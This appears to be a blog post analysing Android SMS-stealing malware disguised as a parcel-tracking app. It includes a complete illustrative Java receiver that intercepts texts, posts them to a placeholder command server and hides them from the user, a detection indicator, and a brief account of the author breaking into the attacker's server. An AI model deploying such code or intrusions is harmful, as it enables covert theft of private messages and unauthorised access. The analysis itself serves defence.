Hello, everyone!
Today I analyzed a piece of malware that mimics a parcel-tracking app.
Once an Android user is infected, all of their SMS messages are transmitted to a server the attacker owns. In addition, the attacker can block SMS messages from being shown to the user if necessary.
Block SMS messages.
Send the infected user's information to the server.
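The two capabilities above are the standard pattern of an Android SMS stealer: a high-priority receiver for incoming SMS that forwards the message to the attacker's server and, optionally, aborts the broadcast so the user's messaging app never displays it. The following is an added illustrative reconstruction of that pattern, written here to explain the behaviour; it is not the malware's own code, which is not reproduced on this page. The C2 URL, the JSON field names, and the `BLOCK_FROM_USER` switch are assumptions.

```java
// Illustrative SMS-stealer receiver (added example, NOT the SPYPHONE code).
// Manifest requirements (assumed, not shown on the page):
//   <uses-permission android:name="android.permission.RECEIVE_SMS" />
//   <uses-permission android:name="android.permission.INTERNET" />
//   <receiver android:name=".SmsInterceptReceiver">
//     <intent-filter android:priority="999">
//       <action android:name="android.provider.Telephony.SMS_RECEIVED" />
//     </intent-filter>
//   </receiver>
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
import org.json.JSONException;
import org.json.JSONObject;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class SmsInterceptReceiver extends BroadcastReceiver {
    // Hypothetical C2 endpoint; the real server address is not given on the page.
    private static final String C2_URL = "http://example.invalid/sms";
    // Assumed switch for the "block SMS if necessary" behaviour. In a real sample
    // this would typically be toggled by a command from the attacker's server.
    private static final boolean BLOCK_FROM_USER = true;

    @Override
    public void onReceive(Context context, Intent intent) {
        if (!"android.provider.Telephony.SMS_RECEIVED".equals(intent.getAction())) return;
        Bundle bundle = intent.getExtras();
        if (bundle == null) return;
        Object[] pdus = (Object[]) bundle.get("pdus");
        if (pdus == null) return;

        // A long SMS arrives as several PDUs; concatenate the bodies.
        StringBuilder body = new StringBuilder();
        String sender = null;
        for (Object pdu : pdus) {
            SmsMessage msg = SmsMessage.createFromPdu((byte[]) pdu);
            sender = msg.getOriginatingAddress();
            body.append(msg.getMessageBody());
        }

        final JSONObject payload = new JSONObject();
        try {
            payload.put("from", sender);          // assumed field name
            payload.put("body", body.toString()); // assumed field name
        } catch (JSONException e) {
            return;
        }

        // Network I/O is forbidden on the main thread, so exfiltrate from a worker.
        new Thread(() -> exfiltrate(payload.toString())).start();

        // SMS_RECEIVED is an ordered broadcast; on Android 4.3 and earlier a receiver
        // with a higher priority than the messaging app can abort it, so the SMS is
        // never shown to the user. Since Android 4.4 only the default SMS app
        // receives SMS_DELIVER and third-party receivers can no longer suppress it.
        if (BLOCK_FROM_USER) {
            abortBroadcast();
        }
    }

    // Plain HTTP POST of the stolen message to the attacker's server.
    private static void exfiltrate(String json) {
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(C2_URL).openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            conn.setRequestProperty("Content-Type", "application/json");
            try (OutputStream out = conn.getOutputStream()) {
                out.write(json.getBytes(StandardCharsets.UTF_8));
            }
            conn.getResponseCode(); // response is ignored in this illustration
            conn.disconnect();
        } catch (Exception ignored) {
            // A real sample would typically queue and retry; omitted here.
        }
    }
}
```

For detection, the combination of `RECEIVE_SMS` with a high-priority `SMS_RECEIVED` receiver that calls `abortBroadcast()` and opens a network connection from the receiver is a reliable static indicator for this family of stealers, regardless of what the app claims to be.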
An interesting fact is that I found a vulnerability on the server. The vulnerability was in the code that sent stolen SMS messages to the server.
The following screenshot shows how the malware sends stolen SMS messages to the server.
After successfully exploiting the vulnerability, I was able to access the database. In the database there were two different DBs, named spyphone and xiaozhen, so I decided to name the malware SPYPHONE.
VirusTotal Result
https://www.virustotal.com/#/file-analysis/NTE3ZWY1ZTFhMDg0YjJmZjlkMTFkMDE2OWE4ZjA4M2Q6MTUwOTYyODU3Ng==